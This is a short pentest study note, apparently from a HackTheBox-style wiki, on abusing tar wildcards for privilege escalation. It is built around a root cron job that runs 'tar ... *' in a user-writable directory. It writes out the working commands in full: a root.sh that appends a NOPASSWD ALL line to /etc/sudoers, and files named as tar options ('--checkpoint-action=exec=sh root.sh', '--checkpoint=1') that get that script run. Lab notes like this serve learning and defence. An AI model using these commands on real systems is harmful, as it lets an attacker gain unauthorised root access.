wildcard-abuse-tar

Understand characters

?   matches a single char
*   any number
[]  brackets enclose characters and can match any single one at the defined position.
~   user home directory
-   A hyper with brackets will denote a range of characters.

E.g., suppose a cron job is:

#
#
mh dom mon dow command
*/01 * * * * cd /home/htb-student && tar -zcf /home/htb-student/backup.tar.gz *

A wildcard can be abused for privilege escalation is the "tar"

echo 'echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh

echo "" > "--checkpoint-action=exec=sh root.sh"

echo "" > --checkpoint=1

ls -la

When con job runs and it will execute the * commands

sudo -l

Previousvulnerable-services Nextwildcard-abuse

Last updated 1 day ago